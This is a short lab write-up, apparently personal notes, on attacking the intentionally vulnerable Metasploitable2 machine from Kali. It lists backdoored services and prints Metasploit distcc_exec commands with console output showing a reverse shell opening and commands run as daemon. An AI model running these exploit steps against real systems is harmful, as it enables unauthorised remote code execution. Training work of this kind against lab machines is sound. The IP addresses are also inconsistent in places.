Kali: 192.168.0.20/24

MSFable: 192.168.0.51/24

vulnerable service:

• samba ->user map_script
• irc-> unreal_ircd_3281_backdoor
• ftp-> vsftpd_234_backdoor
• Services:Unintentional Backdoors 

  In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. The first of which installed on Metasploitable2 is distccd. This program makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below.

   

  msfconsole

   

  msf > use exploit/unix/misc/distcc_exec

  msf  exploit(distcc_exec) > set RHOST 192.168.99.131

  msf  exploit(distcc_exec) > exploit

  msf > use exploit/unix/misc/distcc_exec
  msf exploit(distcc_exec) > show optionsModule options (exploit/unix/misc/distcc_exec):

  Name   Current Setting  Required  Description
  —-   —————  ——–  ———–
  RHOST                   yes       The target address
  RPORT  3632             yes       The target port

  Exploit target:

  Id  Name
  —  —-
  0   Automatic Target

  msf exploit(distcc_exec) > set rhost 192.168.0.51
  rhost => 192.168.0.51
  msf exploit(distcc_exec) > exploit

  [*] Started reverse TCP double handler on 192.168.0.30:4444
  [*] Accepted the first client connection…
  [*] Accepted the second client connection…
  [*] Command: echo 8gFZ6i8kVEx29A4c;
  [*] Writing to socket A
  [*] Writing to socket B
  [*] Reading from sockets…
  [*] Reading from socket B
  [*] B: “8gFZ6i8kVEx29A4c\r\n”
  [*] Matching…
  [*] A is input…
  [*] Command shell session 2 opened (192.168.0.30:4444 -> 192.168.0.51:57642) at 2016-04-20 21:36:24 -0400

  id
  uid=1(daemon) gid=1(daemon) groups=1(daemon)
  whoami
  daemon

 

Check out here: